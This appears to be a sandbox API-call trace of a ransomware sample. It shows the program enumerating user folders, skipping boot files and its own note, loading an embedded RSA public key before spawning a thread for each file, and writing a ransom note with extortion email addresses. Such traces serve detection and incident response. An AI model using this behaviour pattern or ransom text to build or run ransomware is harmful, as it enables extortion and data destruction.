lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0200.809] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xde0 [0200.809] Sleep (dwMilliseconds=0x96) [0200.965] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0200.965] lstrcmpW (lpString1="E3086E520D4EE960428796111173CDA8.XZZX", lpString2="..") returned 1 [0200.965] lstrcmpW (lpString1="E3086E520D4EE960428796111173CDA8.XZZX", lpString2=".") returned 1 [0200.965] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0200.965] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="ntldr") returned 0x0 [0200.965] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="NTLDR") returned 0x0 [0200.965] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0200.965] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0200.965] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0200.965] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") [0200.965] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.965] lstrcpyW (in: lpString1=0x17addc, lpString2="E3086E520D4EE960428796111173CDA8.XZZX" | out: lpString1="E3086E520D4EE960428796111173CDA8.XZZX") returned="E3086E520D4EE960428796111173CDA8.XZZX" [0200.965] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0200.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xde4 [0200.966] Sleep (dwMilliseconds=0x96) [0201.120] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0201.120] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0201.121] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0201.121] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0201.121] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0201.121] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0201.121] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0201.121] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" [0201.123] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*" [0201.123] SetErrorMode (uMode=0x1) returned 0x1 [0201.123] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\_HELP_INSTRUCTION.TXT") returned 76 [0201.124] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0201.124] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0201.124] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0xde8) returned 0x0 [0201.124] RegQueryValueExW (in: hKey=0xde8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b8cd8, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x43b8cd8*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0201.124] RegCloseKey (hKey=0xde8) returned 0x0 [0201.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0201.124] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0201.124] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xde8 [0201.124] CloseHandle (hObject=0xde8) returned 1 [0201.124] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0201.125] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="wpc5n64XVm" [0201.125] lstrcpyW (in: lpString1=0x17a5a4, lpString2="wpc5n64XVm" | out: lpString1="wpc5n64XVm") returned="wpc5n64XVm" [0201.125] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0201.125] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0201.125] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0201.125] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0201.125] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0201.125] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0201.125] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0201.125] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0201.125] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0201.125] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0201.125] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0201.125] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0201.125] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0201.125] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0201.125] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0201.125] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0201.126] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0201.126] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0201.126] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0201.126] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0201.126] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.126] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0201.126] FindClose (in: hFindFile=0x43723f8 | out: hFindFile=0x43723f8) returned 1 [0201.126] FindClose (in: hFindFile=0x43723f8 | out: hFindFile=0x43723f8) returned 0 [0201.126] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0201.126] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0201.126] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0201.126] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0201.126] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0201.126] lstrcatW (in: lpString1="C:\\Users\\", lpString2="All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users" [0201.126] SetErrorMode (uMode=0x1) returned 0x1 [0201.126] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users" [0201.126] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\" [0201.126] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\All Users\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\" [0201.126] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\*.*") returned="C:\\Users\\All Users\\*.*" [0201.127] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x43723f8 [0201.127] PathFindFileNameW (pszPath="C:\\Users\\All Users") returned="All Users" [0201.127] lstrcpyW (in: lpString1=0x17d784, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0201.127] FindClose (in: hFindFile=0x43723f8 | out: hFindFile=0x43723f8) returned 1 [0201.127] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users" [0201.127] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\*.*") returned="C:\\Users\\All Users\\*.*" [0201.127] SetErrorMode (uMode=0x1) returned 0x1 [0201.127] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\All Users\\_HELP_INSTRUCTION.TXT") returned 40 [0201.127] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0201.127] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0201.127] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0xdec) returned 0x0 [0201.127] RegQueryValueExW (in: hKey=0xdec, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b8f08, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x43b8f08*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0201.128] RegCloseKey (hKey=0xdec) returned 0x0 [0201.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0201.128] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0201.128] CreateFileW (lpFileName="C:\\Users\\All Users\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\all users\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xdec [0201.128] CloseHandle (hObject=0xdec) returned 1 [0201.128] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x43723f8 [0201.128] PathFindFileNameW (pszPath="C:\\Users\\All Users") returned="All Users" [0201.128] lstrcpyW (in: lpString1=0x17d784, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0201.128] FindClose (in: hFindFile=0x43723f8 | out: hFindFile=0x43723f8) returned 1 [0201.128] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0201.128] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0201.128] lstrcmpW (lpString1="Default", lpString2="..") returned 1 [0201.128] lstrcmpW (lpString1="Default", lpString2=".") returned 1 [0201.128] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0201.128] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0201.128] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0201.129] SetErrorMode (uMode=0x1) returned 0x1 [0201.129] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0201.129] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0201.129] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0201.129] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\*.*") returned="C:\\Users\\Default\\*.*" [0201.129] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x43723f8 [0201.129] PathFindFileNameW (pszPath="C:\\Users\\Default") returned="Default" [0201.129] lstrcpyW (in: lpString1=0x17d784, lpString2="Default" | out: lpString1="Default") returned="Default" [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.129] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.130] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0201.130] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0201.130] StrStrW (lpFirst="NTUSER.DAT", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0201.130] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntldr") returned 0x0 [0201.130] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTLDR") returned 0x0 [0201.130] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTDETECT.COM") returned 0x0 [0201.130] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntdetect.com") returned 0x0 [0201.130] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0201.130] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\") [0201.130] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.130] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0201.130] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdf0 [0201.131] Sleep (dwMilliseconds=0x96) [0201.278] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.278] lstrcmpW (lpString1="NTUSER.DAT.LOG", lpString2="..") returned 1 [0201.278] lstrcmpW (lpString1="NTUSER.DAT.LOG", lpString2=".") returned 1 [0201.278] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0201.278] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="ntldr") returned 0x0 [0201.278] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="NTLDR") returned 0x0 [0201.278] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="NTDETECT.COM") returned 0x0 [0201.278] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="ntdetect.com") returned 0x0 [0201.278] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0201.278] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\") [0201.278] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.278] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT.LOG" | out: lpString1="NTUSER.DAT.LOG") returned="NTUSER.DAT.LOG" [0201.279] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.279] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdf4 [0201.279] Sleep (dwMilliseconds=0x96) [0201.433] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.433] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2="..") returned 1 [0201.433] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2=".") returned 1 [0201.433] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0201.435] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="ntldr") returned 0x0 [0201.435] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="NTLDR") returned 0x0 [0201.435] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="NTDETECT.COM") returned 0x0 [0201.435] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="ntdetect.com") returned 0x0 [0201.435] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0201.435] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\") [0201.435] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 